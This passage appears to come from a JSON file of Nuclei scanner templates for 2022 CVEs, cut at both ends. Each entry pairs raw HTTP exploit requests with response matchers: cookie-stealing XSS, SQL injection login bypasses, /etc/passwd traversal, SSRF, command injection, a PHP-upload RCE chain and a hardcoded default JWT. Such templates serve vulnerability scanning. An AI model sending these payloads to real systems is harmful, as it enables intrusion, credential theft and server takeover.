/mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3869","info":{"name":"Froxlor < 0.10.38.2. - HTML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The message to \"\"><h2>TEST</h2>\" failed"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47075","info":{"name":"Smart Office Web 20.28 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ExportReportingManager.aspx"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/CSV\")","contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-32430","info":{"name":"Lin CMS Spring Boot - Default JWT Token","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/admin/group/all"],"headers":{"Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"level\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]},{"type":"word","part":"body","words":["<html","<body","<script"],"negative":true}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: 